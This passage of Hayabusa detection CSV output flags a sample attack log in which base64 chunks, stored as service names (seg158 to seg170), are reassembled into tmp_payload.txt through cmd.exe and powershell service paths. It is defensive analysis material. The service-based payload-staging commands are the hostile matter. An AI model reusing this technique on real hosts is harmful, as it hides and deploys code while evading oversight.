deployed via service - Tchopper.evtx" +2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file 
-append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | 
select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell 
-command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:11.900 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 